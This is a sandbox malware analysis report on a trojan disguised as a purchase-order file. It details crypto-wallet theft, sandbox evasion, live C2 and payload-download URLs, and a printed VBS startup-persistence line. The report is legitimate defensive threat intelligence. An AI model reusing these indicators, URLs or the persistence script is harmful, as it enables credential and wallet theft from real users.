Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet@\]q com.liberty.jaxx
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q1C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: InstallUtil.exe, 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: Yara match | File source: 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4467446341.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 5008, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | Valid Accounts | 321 Windows Management Instrumentation | 111 Scripting | 212 Process Injection | 1 Masquerading | OS Credential Dumping | 621 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Registry Run Keys / Startup Folder | 2 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 341 Virtualization/Sandbox Evasion | Security Account Manager | 341 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 212 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Behavior Graph ID: 1586913, Sample: PO-12202432_ACD_Group.pif.exe, Startdate: 09/01/2025, Architecture: WINDOWS, Score: 100
• Top level
  DNS/IP: pureeratee.duckdns.org (signature: Uses dynamic DNS services), www.chirreeirl.com, chirreeirl.com
  Signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 6 other signatures
• PO-12202432_ACD_Group.pif.exe (started)
  DNS/IP: chirreeirl.com, 209.58.149.225, 443, 49704, 49712, LEASEWEB-USA-DAL-10US, United States
  Dropped: C:\Users\user\...\IsNestedFamANDAssem.exe, PE32; C:\Users\user\...\IsNestedFamANDAssem.vbs, ASCII; IsNestedFamANDAssem.exe:Zone.Identifier, ASCII
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 2 other signatures
  Started: InstallUtil.exe
    DNS/IP: pureeratee.duckdns.org, 193.187.91.218, 49710, 50787, OBE-EUROPEObenetworkEuropeSE, Sweden
    Signatures: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); 3 other signatures
• wscript.exe (started)
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: IsNestedFamANDAssem.exe
    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
    Started: InstallUtil.exe

Source | Detection | Scanner | Label
PO-12202432_ACD_Group.pif.exe | 68% | ReversingLabs | Win32.Trojan.Leonem
PO-12202432_ACD_Group.pif.exe | 100% | Avira | HEUR/AGEN.1308638
PO-12202432_ACD_Group.pif.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | 100% | Avira | HEUR/AGEN.1308638
C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | 68% | ReversingLabs | Win32.Trojan.Leonem

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4 | 0% | Avira URL Cloud | safe
https://www.chirreeirl.com | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pureeratee.duckdns.org | 193.187.91.218 | true | true | | unknown
chirreeirl.com | 209.58.149.225 | true | false | | unknown
www.chirreeirl.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4 | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/mgravell/protobuf-neti | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll | InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354rCannot | InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe | InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe | InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2523565874.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-net | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2169631099.0000000006760000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://www.chirreeirl.com | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4467446341.000000000295F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
209.58.149.225 | chirreeirl.com | United States | 394380 | LEASEWEB-USA-DAL-10US | false
193.187.91.218 | pureeratee.duckdns.org | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | true

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1586913
                                              Start date and time:2025-01-09 18:56:05 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 41s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:PO-12202432_ACD_Group.pif.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 88%
                                              • Number of executed functions: 399
                                              • Number of non-executed functions: 34
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 172.202.163.200
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target InstallUtil.exe, PID 5008 because it is empty
                                              • Execution Graph export aborted for target InstallUtil.exe, PID 5488 because it is empty
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: PO-12202432_ACD_Group.pif.exe

Time | Type | Description
12:56:51 | API Interceptor | 24x Sleep call for process: PO-12202432_ACD_Group.pif.exe modified
12:57:12 | API Interceptor | 11467310x Sleep call for process: InstallUtil.exe modified
12:57:14 | API Interceptor | 20x Sleep call for process: IsNestedFamANDAssem.exe modified
18:57:05 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

Match | Associated Sample Name / URL | Detection | Threat Name | Context
209.58.149.225 | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown |
209.58.149.225 | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown |
209.58.149.225 | https://contract-kitchensbywoodys16713653.brizy.site/ | malicious | Unknown |
193.187.91.218 | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown |
193.187.91.218 | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
pureeratee.duckdns.org | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 193.187.91.218
pureeratee.duckdns.org | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 193.187.91.218

Match | Associated Sample Name / URL | Detection | Threat Name | Context
LEASEWEB-USA-DAL-10US | https://ccml.io/ | malicious | Unknown | 172.241.26.5
LEASEWEB-USA-DAL-10US | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 209.58.149.225
LEASEWEB-USA-DAL-10US | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 209.58.149.225
LEASEWEB-USA-DAL-10US | xd.mpsl.elf | malicious | Mirai | 172.241.229.61
LEASEWEB-USA-DAL-10US | Payload 94.75 (2).225.exe | malicious | Unknown | 209.58.145.210
LEASEWEB-USA-DAL-10US | JHPvqMzKbz.exe | malicious | Vidar | 172.241.51.69
LEASEWEB-USA-DAL-10US | arm7.elf | malicious | Unknown | 172.241.27.111
LEASEWEB-USA-DAL-10US | https://bitfinexinvestment.com/ | malicious | Unknown | 209.58.153.106
LEASEWEB-USA-DAL-10US | http://www.web3walletsync.com/ | malicious | Unknown | 209.58.146.114
LEASEWEB-USA-DAL-10US | https://click.dn.askhelp247.com/?qs=56daa84a9aeab310141fd7b3abd36125b539fd4f3799231d7ea795f5ca63ee3d16f8d954cbf1ffa46296eb2ff8fe4db6c125eafbd8e358283667a34a51f183ee | malicious | Unknown | 172.241.26.5
OBE-EUROPEObenetworkEuropeSE | G6hxXf90i5.exe | malicious | Unknown | 185.157.162.103
OBE-EUROPEObenetworkEuropeSE | G6hxXf90i5.exe | malicious | Unknown | 185.157.162.103
OBE-EUROPEObenetworkEuropeSE | file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig | 185.157.162.216
OBE-EUROPEObenetworkEuropeSE | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 193.187.91.218
OBE-EUROPEObenetworkEuropeSE | RFQ-12202431_ACD_Group.pif.exe | malicious | Unknown | 193.187.91.218
OBE-EUROPEObenetworkEuropeSE | ZppxPm0ASs.exe | malicious | Xmrig | 185.157.162.216
OBE-EUROPEObenetworkEuropeSE | file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | 185.157.162.216
OBE-EUROPEObenetworkEuropeSE | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 185.157.162.216
OBE-EUROPEObenetworkEuropeSE | file.exe | malicious | Xmrig | 185.157.162.216
OBE-EUROPEObenetworkEuropeSE | file.exe | malicious | Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc | 185.157.162.216

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Nuevo pedido.exe | malicious | Snake Keylogger, VIP Keylogger | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | Copy shipping docs PO EV1786 LY ECO PAK EV1.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | http://cipassoitalia.it | malicious | CAPTCHA Scam ClickFix | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | JB#40044 Order.exe | malicious | MassLogger RAT | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | bc7EKCf.exe | malicious | StormKitty | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | s7.mp4.hta | malicious | LummaC | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | chrtrome22.exe | malicious | Xmrig | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | 5dFLJyS86S.ps1 | malicious | Unknown | 209.58.149.225
3b5074b1b5d032e5620f69f9f700ff0e | PO1178236.scr.exe | malicious | Unknown | 209.58.149.225

No context

                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1183
                                                        Entropy (8bit):5.349889760691853
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzetfE4KnKIE4oKNzKo9E4KhM:MxHKlYHKh3oRAHKzetfHKntHo6lHKG
                                                        MD5:91323CD5C720493F291A5308AF630221
                                                        SHA1:1F94B2F25F7CE942EA6289E8B74295F4689F8A1B
                                                        SHA-256:8EB1993F0CE22F0757AA4E5DB1CF6173C44EBE5CA272CEDFC141961E0A63DE1A
                                                        SHA-512:46858065C5A8BE1BDB19AE7E6A03E6853F65F4F958291733AF36D2C5208072AD5E5EE0C28080FC5D462551445B69BF7D4D5B1E50857FF7E5D7BF36FEABB54E98
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n
                                                        Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):27136
                                                        Entropy (8bit):5.516192210902329
                                                        Encrypted:false
                                                        SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                        MD5:95BEC6594E293A42F4ABB049EA7E81DB
                                                        SHA1:36ECE8150F0619FC81BBF92BD840CAD252BF1AEA
                                                        SHA-256:43057C1F8E32C29342CFB790C692C291F33526F9BE1380758B9C7C42344A5948
                                                        SHA-512:51989412F10AA223E52190587EBF20D0EF447C96D75B9C1D6592DB9C1814D9F56C213CF4B2AD1543D5FC5F20A775D0DB55820D5725A88EF983C454020E6A68C4
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.xg.................`..........2~... ........@.. ....................................`..................................}..J.......~............................................................................ ............... ..H............text...8^... ...`.................. ..`.rsrc...~............b..............@..@.reloc...............h..............@..B.................~......H........D...9...........................................................0..]........d+>.%-.+;.-.+.+7+8Y.-.+5+6.,..X+2+3+42..,.r...p..(....(....(....*.+..+..+..+..+..+..+..+..+......( ...*..( ...*B+..+.*.+.(....+.....0..R.......+C+D~5...%-.&~4.....p...s!...%.5...~6...%-.&~4.....q...s"...%.6...+.*.+..+.(...++....s#...%(.....+.u....r1..p .......+.+.*o$...+.o%...+.o&...+...+.&*(....+..0..........8....-.rE..p8....z8....-.rQ..p8....z8....8....8.....8....8....8..........XoK....,...
                                                        Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):95
                                                        Entropy (8bit):4.834234199155982
                                                        Encrypted:false
                                                        SSDEEP:3:FER/n0eFHHoUkh4EaKC5fmVhRt0dinn:FER/lFHI9aZ5fmV3t0din
                                                        MD5:E5B1EDE78023372737C1B237DE79C923
                                                        SHA1:41C0C32357716734A7218D3905291EE7DD8289E6
                                                        SHA-256:DB9DD5EC3837B863774EE122EFC88BC2BCA8894480AB5E922F82AB60ADBF9307
                                                        SHA-512:CE9AFCAEF7E8FAE5D523ABDB817160D9319F0FA4045B805713D7A17E62462D48FE853B6D9081DAD6E01305F624E714A4BE0E88010F465A14647F0B785A183AC7
                                                        Malicious:true
                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"""
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.516192210902329
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:PO-12202432_ACD_Group.pif.exe
                                                        File size:27'136 bytes
                                                        MD5:95bec6594e293a42f4abb049ea7e81db
                                                        SHA1:36ece8150f0619fc81bbf92bd840cad252bf1aea
                                                        SHA256:43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948
                                                        SHA512:51989412f10aa223e52190587ebf20d0ef447c96d75b9c1d6592db9c1814d9f56c213cf4b2ad1543d5fc5f20a775d0db55820d5725a88ef983c454020e6a68c4
                                                        SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                        TLSH:C7C26B6CC3D81A62CBFE5F3A98F55340877AFB0EB99BE75F088435CA5E027A4445071A
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.xg.................`..........2~... ........@.. ....................................`................................
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x407e32
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6778044F [Fri Jan 3 15:37:51 2025 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7de8 | 0x4a | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x57e | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa000 | 0xc | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x2000 | 0x5e38 | 0x6000 | 209c320cd40e1081977ee08e6bed8a75 | False | 0.507568359375 | data | 5.6830361681553905 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x8000 | 0x57e | 0x600 | ba933dc11f614b448d59b20e0df9569f | False | 0.419921875 | data | 4.046378908802311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0xa000 | 0xc | 0x200 | f8fc6b4d2a42baf72ffb6180102cd58f | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_VERSION | 0x805c | 0x2fc | data | | | 0.43717277486910994
                                                        RT_MANIFEST | 0x8394 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                        DLL | Import
                                                        mscoree.dll | _CorExeMain
                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                        2025-01-09T18:57:13.558600+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 193.187.91.218 | 50787 | 192.168.2.5 | 49710 | TCP
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Jan 9, 2025 18:56:55.091376066 CET49704443192.168.2.5209.58.149.225
